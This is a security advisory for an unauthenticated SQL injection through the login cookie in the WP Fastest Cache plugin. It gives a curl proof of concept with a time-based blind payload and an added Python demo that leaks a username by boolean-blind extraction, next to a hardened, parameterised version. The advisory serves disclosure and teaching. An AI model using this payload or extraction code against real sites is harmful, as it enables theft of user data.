Description: The plugin does not properly sanitise and escape the value of the wordpress_logged_in cookie before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. The proof of concept below uses a time-based blind payload (MySQL SLEEP), so a successful test shows up as a delayed response rather than as output on the page.
Proof of Concept

1. Visit WP Fastest Cache > Settings. Ensure "Cache System" is enabled and "Logged-in Users" is disabled. Click "Submit" at the bottom.
2. The following curl command demonstrates the SQLi; the request should take roughly 5 seconds longer than a normal response:

curl https://example.com -H "Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"
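The following is an added example, not code from WP Fastest Cache or from the advisory: it reconstructs the bug class described above (a cookie value concatenated straight into a SQL query) against a constructed in-memory SQLite table, shows how the percent-encoded cookie from the proof of concept decodes on the server side, turns the injection into a boolean-blind oracle that leaks a username one character at a time, and contrasts it with a hardened lookup that validates and binds the value. Function names, the table layout and the sample rows are all hypothetical. SQLite has no SLEEP() and does not reliably treat double-quoted strings as literals, so the demo query uses single-quoted literals and a boolean condition where the advisory's MySQL payload uses double quotes and a time delay; the technique is otherwise the same.

```python
import sqlite3
from urllib.parse import unquote

# Cookie header taken from the proof of concept above (percent-encoded MySQL payload).
ADVISORY_COOKIE = (
    "wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20"
    "(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"
)

# Constructed sample rows standing in for a wp_users table (hypothetical data).
SAMPLE_USERS = [(1, "admin"), (1234, "editor"), (1235, "author")]


def make_db():
    """Build an in-memory stand-in for wp_users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT NOT NULL)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def cookie_value(cookie_header, name="wordpress_logged_in"):
    """Return one cookie's URL-decoded value, i.e. what PHP exposes in $_COOKIE."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return unquote(value)
    return None


def lookup_user_vulnerable(conn, raw_id):
    """Hypothetical vulnerable pattern: the cookie value is interpolated into the SQL text.

    A value such as  1234' AND (<condition>) AND 'a'='a  closes the literal and
    appends attacker-controlled conditions to the WHERE clause.
    """
    sql = f"SELECT ID, user_login FROM wp_users WHERE ID = '{raw_id}'"
    return conn.execute(sql).fetchone()


def lookup_user_hardened(conn, raw_id):
    """Hardened form: enforce the expected shape (an integer ID) and bind it as a parameter."""
    if not raw_id.isdigit():
        return None
    return conn.execute(
        "SELECT ID, user_login FROM wp_users WHERE ID = ?", (int(raw_id),)
    ).fetchone()


def oracle(conn, lookup, condition_sql):
    """Boolean-blind oracle: True when the injected condition let the row for ID 1234 come back.

    This is the boolean analogue of the advisory's SLEEP(5) payload, where the
    signal is response time instead of row presence.
    """
    payload = f"1234' AND ({condition_sql}) AND 'a'='a"
    return lookup(conn, payload) is not None


def extract_login(conn, lookup, user_id, max_len=20):
    """Recover a user_login character by character through the oracle.

    Returns an empty string when the lookup is not injectable.
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789_"
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for ch in charset:
            condition = (
                f"substr((SELECT user_login FROM wp_users WHERE ID = {int(user_id)}), {pos}, 1) = '{ch}'"
            )
            if oracle(conn, lookup, condition):
                matched = ch
                break
        if matched is None:
            break  # past the end of the string, or no injection at all
        recovered += matched
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("server sees cookie value:", cookie_value(ADVISORY_COOKIE))
    print("vulnerable lookup leaks login of ID 1:", extract_login(db, lookup_user_vulnerable, 1))
    print("hardened lookup leaks:", repr(extract_login(db, lookup_user_hardened, 1)))
```

The validation step in lookup_user_hardened matters as much as the parameter binding: binding alone would stop the injection, but rejecting anything that is not a plain integer also keeps the real WordPress cookie format (username|expiry|token|hmac) from ever reaching a numeric comparison it was never meant for.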
CPE | Name | Operator | Version
---|---|---|---
 | | eq | 1.2.2